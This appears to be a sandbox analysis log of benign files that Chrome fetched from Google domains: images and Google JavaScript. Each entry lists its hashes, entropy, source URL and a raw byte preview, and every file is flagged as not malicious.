                                                                                                                                                                                                                                                            Size (bytes):27393
                                                                                                                                                                                                                                                            Entropy (8bit):7.972219336319506
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bjHh3Q6DGKIgRb3IZmtxsThOTZNFPBChnZ8zL:vhnWgZ4Zmt+IHFZBzL
                                                                                                                                                                                                                                                            MD5:4E7106B38E48741D8FDE6011F483E9FF
                                                                                                                                                                                                                                                            SHA1:42A594D343A29EA6E4ED73C6917219AB444E0518
                                                                                                                                                                                                                                                            SHA-256:D091C9A0DD5A828572A9D8F3506B6B259DEF21D94800ACEEA1839CCFFD9A6256
                                                                                                                                                                                                                                                            SHA-512:395F097C4F93EEA91733373E80E6B08F58D643DA998F413B7663DCDB5A3E7D6DDCA4CBE8244CFAB4D15F69F51B548169FBB072D05C43C300964AFED365DB3A8D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................D.........................!..1AQ."aq...2...BR..#b....r..$3C....4c............................................................!.1.AQ.".a.2.Sq..3BR............?.....:..FS..F...R. Y`O..j.....F.j...QP..d..P6.%Z...$..u..&FJ...;.~....!\S$.#'A...GQ..f)./....#2.7...#7...8"...^I.5....WV5..2.$!.m=...["L.........Jn.MN...1.(....Z...]"..L.T....$..o..Y..T).V-&$.mJ.......y.}P-.....`.4A..i.Y@...e.....Q+h.e.#..5.CTk"J.YrQ.~...CDk%u._...j..e........qA..qKHF..@.$k4....p&..E...fv<;.X,lH...s..fr.1..8.-um..1.jg.{.8h.V8..3{..#u. w..O...Q%.#.d7......&..g./c...z.T....ie......1.....z..C..rg..7.&....`.^.'$.vlb.t..?.7.H..6.N+.&....&..i\I./',..a...q.}......3@..,I..$....!.[B.q\.W.].$.+.(g&....x.......X{.e=~.......Y@"f\.(X.5.....,*&\.....#dX.LL..0. H..Mf..{.c.7I....z... .r..'#3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 850 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):30705
                                                                                                                                                                                                                                                            Entropy (8bit):7.981692386751896
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Qf2pUWJccDBX/E/k+5gpIGCCq4KyAVdA733R40A:3pU+DpX+qiGCd4KyAXc3B4t
                                                                                                                                                                                                                                                            MD5:2236CF423BFE4A7426DED26C5966B0F3
                                                                                                                                                                                                                                                            SHA1:22C7E210F93CD17F6D3740DAC6216B578414C291
                                                                                                                                                                                                                                                            SHA-256:589031AED6ABF827386F9582D80AC66FB69B4AE27DD21E0B1FC851FCA0BCC939
                                                                                                                                                                                                                                                            SHA-512:AD097B39192F673DE533448D1C5E76946F70CD99E000F662865CD221163C892F8CBB1017E29BD7AE72C45073FBDF0902C3D41CDF985175668F560540F59A635C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2021/nowruz-2021-6753651837108889-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...R..........G......PLTE..................................................................................i.^.Y.....d.e.b....f.......y.p...........................o.e....C.K.]............z.|5..:.>.S........A.D...........................nl.............t.G.9.F.l>C'(K//jE4.u.HvN:P3/.U9.C.X...?.G]>7.E.EV82.K.`..F.d.[..U..T....E..D.~:....O..fIHu\Z..E..^.zy.C..D.D._...........~.....s..bq.jx.\l....Vg.FY.N`.AT.CV.Rd.>R.H[.JZ.I\..C...`<..........Y.ic.qO.`E.W<.Pm.z......"s=,xD0zF7~L4}J2{H0{H3|I....(vA4|I......$t?.s?...k>K^........~.............................u.............................WZ.BG.LP.>D.9>.qt.....|~.il...ad.6<.;A.28.?Dk.I.p9.r:...T..J.tH.rA.l^..l..u..........n.y.v.k.Y.(...t.IDATx................<..........................._....9.\{...N....D. ...4{WuS...W...2..}'.L\...g.'.7{..g-,.D"R..H.a.Wr.G..$.O..B.n..%Y..@g.|.#.|..C.....A,.m.8.$.....!7!..[..L.y..s...|yN.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):277497
                                                                                                                                                                                                                                                            Entropy (8bit):7.856574749625998
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:VFOwz7TMWuXHwjPlASaUqo3Z9vrW7yfAYgJTuioxKI/yf9:V3z7QWuXHwjK9UqgbrHE1oIf9
                                                                                                                                                                                                                                                            MD5:672BFA55B918B562F6F1DE38EDDFBC93
                                                                                                                                                                                                                                                            SHA1:481B9A02CD93EC8B3D03A386AF43312352D1D6A4
                                                                                                                                                                                                                                                            SHA-256:6F260BF3EACB674168155CFB377A8DF06DA619FD7CC6B62F406ACE0113F81ECC
                                                                                                                                                                                                                                                            SHA-512:EC85CBADE2082E4F8971990BD42D4E976EF7465B93D36B2737C670E3079FED0434E7C8C26431BF0DD25F38E54C67475DAC2CFAC3775F81CC607712FE68E5195F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/translate/pwt_hackathon_bard_logo_resting.gif
                                                                                                                                                                                                                                                            Preview:GIF89a@.@..........!..NETSCAPE2.0.....!.......,....@.@...............................<....!....3..4...................$.....,..*..7............&......9..B..H..>........................./..2..%..&.. ....1../..'{.S..<....,..'....A.....4..:....u.K..........L.....K..}.ON.|n.b..B..IU.f]....p.S..5..D{.VU....O.m..!`.[i.Q|.M.............M.t..K..L....[..v..../.....@.....~b.Tr.MU..q.`h._r.UV.`..5..*d.pQ..O........M..........u..M.....i.t..U..j.nM..V.s.....n.x...................S......B.....2S....t.^..S..)g.rP.....].ez.E...x.I..|k.IX._.!c.i.....r.....#..J..7..Hu.^..M..U..G..?...~.G...._`..d............z.ZX...........................}\....>...g....B..3..H....Y...3.....hM....z..w.G......`..R..S.......U..v.G..Z..z}....|......n....nb.vW..........W.}n.......e..u...................H......*\....#J.H....3R.D).........I.J..R...[.D.h..c..$H..V.c$.7n........q.......!.....vrxH3u"..4h...E.(..BD.....0.h..BU#...5......Dp..c./CdS....*.!,z.ypb...H.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):26090
                                                                                                                                                                                                                                                            Entropy (8bit):7.963459634654199
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Mpv/83sXBsXeKwinS3YfdbA0zg1uTN6hvAlG8SQ944MD:Ov/83sXGuKwoJdbp9N6hvAlpSsq
                                                                                                                                                                                                                                                            MD5:3944CBEA92294B18CF2A5F7A44D9D8D8
                                                                                                                                                                                                                                                            SHA1:99785F157EA699D6398D00E21B55C88A12B5D542
                                                                                                                                                                                                                                                            SHA-256:CB87EACB152A9863DAD1DDE9A2A0D1F67A385D4245C4DFA034F8B199F5B2B8A4
                                                                                                                                                                                                                                                            SHA-512:37798E481B5635AB7AACCD149291F458C1AEF10E8B47DD4F2E3EF492AE5E6764B3AC87E1ACDE37882C558E19138945BC65718D09C0E53B90D83DAC8D0A22AFE1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/TYyhtgs6po_zT3exdwvm3xqA-J_-scIhbNvmNQHFNs87MSWcwWtaoQYJdvcuI8VF967PFWWGsKVcevUYTygdwHcdvxLVprxS5wEf-58iDfNjLH9UiSlF
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................E......................!..1.AQ..."aq.........2..#BR.b.$3r%.....4CDS.................................8........................!1A.Q.."aq....2BR.....#r..3...............?..`......... .."P+...p.rHB`.j(vH.1.m$.......@.@.......<t.D.......(@.@.sO....'A....'p..(....;$....&!.@"...TP..C%.....F./2&.TZt.Zt-....P....!...s.6@... .....;..!bP.4..Je..'......^"L..0.$...E... .......... ...fE......cZ..0.P..iJ.`[(N...&g.BP]....n..R.4(.".....L.....i.[.+4...*/r"...V.....Bc.[DI..&C.D.....C-@XeE..%..M..H5.6,...D.p..=.-A6...........{..|.|...KJ.V.#.~.h{.*[Ed:....K........s...h.@.@....:_....Q$0Y.X&....{...H...6..{.x.{.! `...(.@......U.... ["F.q.{.~~.1..I..-5...%qD..%!h..@%V..'N.&..M...-J.&SR...|...c|..%....<...T..%l...%F....O?T..C.....w...C.d.@ ....@..;......S6....E:.E..+..h.1-....Da..0
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):32988
                                                                                                                                                                                                                                                            Entropy (8bit):3.7980479441426356
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:qoc51d1ocG7izw6FdV4qZoW/CnJWjYSMyABwfUqpY940/3E:VcXvoAmtw
                                                                                                                                                                                                                                                            MD5:A388ABC14CE81AB733AE69A804E87880
                                                                                                                                                                                                                                                            SHA1:A80914F192FDF163AA52DE8C0265D202721B1144
                                                                                                                                                                                                                                                            SHA-256:06FD4BA3B981A0765DC1E8FCD5AA2FAF802323D5367D7CA0B8AFB7F896F2E81F
                                                                                                                                                                                                                                                            SHA-512:3F4C53087C54E5B15F342D4982BC2E01F14F92E32417433C51F9967E3B46F88922831D2CCE4AD5F9A87855586A75F14F49792623C2FB0BDD187C474628641EE1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......@@.... .(@..F... .... .(...n@........ .(....P........ .(....Y..(...@......... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................xd...................................................................................................qq.......................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):69280
                                                                                                                                                                                                                                                            Entropy (8bit):7.994691466011386
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:1536:HDcltEmzRKaJVE4LJ2sTpGVLSAPqO1oDeGDDM2JGf26:jc8mFKaz/JJAS+1fGsa4v
                                                                                                                                                                                                                                                            MD5:4CB8D6C2A61CA423A1B4FA77CB4AA232
                                                                                                                                                                                                                                                            SHA1:29B0EFEBC3D9E876F0F730DDDA10BF174DB60899
                                                                                                                                                                                                                                                            SHA-256:018CBFC6933AC37BF57342296AA9A3AA304785BA54D301BE9CEA46CCB127B572
                                                                                                                                                                                                                                                            SHA-512:80DCE20CEE1967B7B7BD56A3D9A045EBD90483640D6176BF80163A0A42B5D4AEE3CFB7F2A017E89B97C524A318F9612A2B4B17ED0EA471169474D3BC75275A20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/c8/7d/6c232851452cb68120f7c83ba445/banner.webp
                                                                                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........j..ALPH.[.....m.H+..{......n.)...C.G.oEo_.Y...D.....".....25n......d.....9....K`w.^ .....!X6H....w.d!,...`.%.dk....^.4.yf..q.[]b:......m....BP...p..p........Hvcg...:.+o9..v..v.Wv;.G..S;....... .(J:M-w.H.4.XMRb.b..r)Q.x.\.P.b..<3..P(........ .Zi.....$>.......q...<]D........n..)n..&.||...o.J.......'q&.!"E.........T&.......o.e.$.+!..e....1....1..u ..+..F....j.vM.bx...$W.<o.N..@MJ..U.B.Y.........\.Xz..F....|.y.BL........@.W..++ .+..;..U.m.B.+..Hk._.X.j.*....U.Xl".U.X.6E2TVA\i.m..W..W...e....L...r......u.\Ixu.e..+.!.$.U?...j..r&..b"KN&Co......d....".U.....`8..F....B.X.L.d<._.......{.[.p.@..i{{.......kC........oK.H.*..3.....h..]\$....V....].?.>a..d|..V:J.x.y.....X'.....m...78..q]......m.......X..2..8...L.wm.........3l..1.....y[..3i.!..LF.m.EL.fv.:...nT.:{..#fE....1}.`E.{mT{..jv.C......3..x...c@7...7.x..-........7......e2.......G.(...C........F.L..6c....b..?fT.x.mW...0.?>b....Z...7..c.r..v.P...i..Q)......R...!<..G.T
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64142
                                                                                                                                                                                                                                                            Entropy (8bit):7.96920201898768
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:jIoRFGg8kZQovcJYjXCZLypIY9qYYstGLqWZ5qpgF:jIoRFkovcSuZ+JtGL5ipgF
                                                                                                                                                                                                                                                            MD5:9E25FF0C6D141A190A48B31022361B0F
                                                                                                                                                                                                                                                            SHA1:323A9D085B29D73E147789ECACAA355796AA4714
                                                                                                                                                                                                                                                            SHA-256:44A0C3188331615B066190C5E11DD616A847D84F33ACCDE90CFBB45E7B3AB4DD
                                                                                                                                                                                                                                                            SHA-512:F9E3D326234F5B2EC768157003F01D51B4149E80A5260DF91ECD065EBE923D8563CCAFE2C66417242367CF5326E962F251D78AF40A350C6213E7907A5847AB3D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................@.....................!...1.AQ.."aq..2......#B....R.b3r..s...$C.................................7......................!..1AQa..."q.......2...B#Rb.3..............?.......+....pi........K.nD(.N..u.i.$.....2.........5 @[. L.....^...#)...8.+9....Wd.....R.......i..x0H#o.C.W5.;.o...L.4.i...rm$...N..Z$IA..k..,.d.....A.q$@"-.....?.F..I..$...:@c.627.i......+. ......D.#..~..c.D.G..Yk.>+(........"L...)&....E.l.B........U.6LQ1..l...s..7..,GCy.q.!.2..".9^.........!..;A....;+...$.zX....~/..]+...-.]..q.U....u...H.p..cq.8.+Ri.3.........[+... FUh...$n...`..6..pH.q.+ZU.h...GKE.o..!..e.....*..Tm.........S..J...Q...z....>..I.t...._c.U...7.X.......R*.....I6.'.. _s~..iT.I.h...+.p..^..dr..w.....u....t.M.O..L..TecSK1.A.'A.X..|r..Uq..*3.Sc.(...8....f...=..6|.....<..S...=#..k."
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (35882)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                            Entropy (8bit):5.622093182972858
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:j1kANRY0xyFjAy9gWRfq13ayiKdc8ULEQXYUICK1b70jnF:jjNRJyFcy9g/13NVa8+EQXY8K1bwjnF
                                                                                                                                                                                                                                                            MD5:F4C36A72F366CE4E5ED00246E638FB34
                                                                                                                                                                                                                                                            SHA1:FCB387FFE72DFBAEF8F7727BA7847E86243E9C9D
                                                                                                                                                                                                                                                            SHA-256:18206F5B2FF26FCEBA864394206C541DD2B8D55A50497215932EDC4146678164
                                                                                                                                                                                                                                                            SHA-512:9EB9920416A5E1490DEB8E1B475288E724F690470E499FC244228863A4C217701F8EBEC2644165C4406A8900E3088020AE2214F3AC24B7E006F73CD685350B8B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/js/th/GCBvWy_yb866hkOUIGxUHdK41VpQSXIVky7cQUZngWQ.js
                                                                                                                                                                                                                                                            Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function b(h){return h}var V=function(h,I,t,L,n){if(!(L=(n=t,g).trustedTypes,L)||!L.createPolicy)return n;try{n=L.createPolicy(I,{createHTML:k,createScript:k,createScriptURL:k})}catch(Q){if(g.console)g.console[h](Q.message)}return n},k=function(h){return b.call(this,h)},g=this||self;(0,eval)(function(h,I){return(I=V("error","ad",null))&&1===h.eval(I.createScript("1"))?function(t){return I.createScript(t)}:function(t){return""+t}}(g)(Array(7824*Math.random()|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==',.'(function(){var w
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x813, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):97340
                                                                                                                                                                                                                                                            Entropy (8bit):7.701123900364287
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:0EsWvnOqLYEV1kmzUSr9WSsxquirzV4WVwqDGYAerPnkNWdGIPdqVPZN2/mE7:0ETvndj1DrkNcuiNbwqDGY00cFZ52
                                                                                                                                                                                                                                                            MD5:D230CE8FED6F1BF76AF2DC198A19AB01
                                                                                                                                                                                                                                                            SHA1:36CCC68DC5A9F51B63864651F62AF51EB28E1313
                                                                                                                                                                                                                                                            SHA-256:2D9327FE34F7FC3FE87356E329F88F0C9DB99988A3844AF6CAE0E9BD45CFFD17
                                                                                                                                                                                                                                                            SHA-512:9232DA5677DE85422DC5E2C28AA11933BD2253B4A7D72432899A1E2B4503D491B852636C67CCC1DAD76BAF5B0088B3DC05DFB31BFF701C1149B3497608122B87
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsORIkB5ttL61Xa-pea_bzBqQf1FvTtqwIhPslB34qDfvvb9hp3A=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................-...."..........................................\.......................!...1.."AQaq...23Rr..#Bbs......5t..4CSu.....$c...%D....6d.....&U.....................................N........................!.1Qq.."Aa.2BRr..3......#4Cb....5Ss.....c.$.....T...............?.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7488
                                                                                                                                                                                                                                                            Entropy (8bit):7.965860210239532
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:2ZXvXhWHsC9Z+hdvuE7ZSasF9ykbA4RexyhFBXkitvWLim+hGGR1AlzIszE+V0ml:2Nvo7+7pajykbQKFxkitv/xCXoFm4zM
                                                                                                                                                                                                                                                            MD5:7F3E0778361E2C8538BC55C78FA5122D
                                                                                                                                                                                                                                                            SHA1:C8A50AC5168FCCE04C3FD2BC8D13E3BD76FEEB2B
                                                                                                                                                                                                                                                            SHA-256:BA4285823DD8C5ED26101FFABBCBDEDD31DFCB7CCDC8802178786843A8E8C112
                                                                                                                                                                                                                                                            SHA-512:D63CAFA8F1554EC4A2D51D5CCBA00F35C3469812206BBBB98C491A207771594F5C1BEA018ADC94D280C9D5D0F5F24478F2C0409C74EFD873B368C499553DCC2D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:RIFF8...WEBPVP8X........l.....ALPH......T.v..B..A..Cx..@fP1p.....@x....ogz'7"&.G...")t.|k.iY=.t..>.Q..i.....z.k.=....&.......EO.]?..Y.....dY{.....<..'.GM.-.....T.A5.../...../...../...../...../......T.N5>.f..,.j..h..#.......f..7.q.m.3.;..c.|!...^.e...\6..e.8^.V..T.J....d..?...........VP8 .........*m...>m2.G.".!$..H...in.>...P..6...%.............?._.y....`......./...^..K.y....._....q.0...0/v.....W.O.}..]........._.?....L._`...?..l................?.%.s.../.....?............'.'..BG..e....EH..".T..R*EH..".T..R*E;.#A.GeIZ....r.q~..U.N....*..........bT.....:...{.$..*.<..OW....l2.E..l.|.X2~k..b..1.D....s....]...3D.(...Y........'u....:.>.h(.;.E....(.$\..A......(...5..m8R.....y9...Tf.F....F.%...$.......W..0...M.._...{~...4.....$..l.O..M0.0......[R.........1.........{.X...7......j.t...H.....O......?z.(.9a.D/.\.:.M..g..8...A4..8.......b.Q(...*,......2N.......e!.9mS$...E..]5..."~.T......0...N!k..........G....f...+....D...8...U.4..<R...y2y).
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2462)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):53025
                                                                                                                                                                                                                                                            Entropy (8bit):5.303152597207011
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:8YrLU/i1+mwEe7O20YFejZuauSkQM2BCf7yjyTAN00pE6afF/EAOr38JmAXzHQvp:8YrLU/g1wEe7O200ejZuauSkQM2BCf7y
                                                                                                                                                                                                                                                            MD5:77A64A808364F153DF48E11D4488EFBC
                                                                                                                                                                                                                                                            SHA1:4EF9A96ED1F2B38C236F28F8E9BCF056701A8AF7
                                                                                                                                                                                                                                                            SHA-256:A35A51E32439CCE8B4DD6734F65C18DEBEC94CA81A30640B2CCABA988CE1639E
                                                                                                                                                                                                                                                            SHA-512:FA7A62645DA6F11B9D8CB9749FC582543EB8DDB3B4EE5124C7713748BF7056E7B352446388523C7D15FCB1CED3D80F97DC33CACDE7D6F366F69354AAA9E1B566
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/eureka/clank/104/cast_sender.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},g="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&g(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(h,k){this.g=h;g(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toStri
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1245)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):122764
                                                                                                                                                                                                                                                            Entropy (8bit):5.719791094958388
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:pX2TELfaustewRIb2Q13/Jcz3j0rJIJtWJb58vuuBihkmISAYgWV3PX91edizgVR:pX2TELf73/Jc7RAQv3m2YgP4gM9lj4D
                                                                                                                                                                                                                                                            MD5:8A9C2BE4D9F328363D3F4F968CB051BA
                                                                                                                                                                                                                                                            SHA1:1707021B770CFD81412F3782A3C48F55B55F6927
                                                                                                                                                                                                                                                            SHA-256:1AEAE1FE0B325AA2A8E4DB7544C24EBE8B08CE841A772074E0B48991B7CDFD94
                                                                                                                                                                                                                                                            SHA-512:A8A616724281E8630902E1752873645E199A37246082D3C892CE6F563C7BF2C1D7BCD954E34EFBB8BE8FA9D70819915D9E166E09515322BD8689AC5894A7E421
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=sOXFj,q0xTif,HgVFRb"
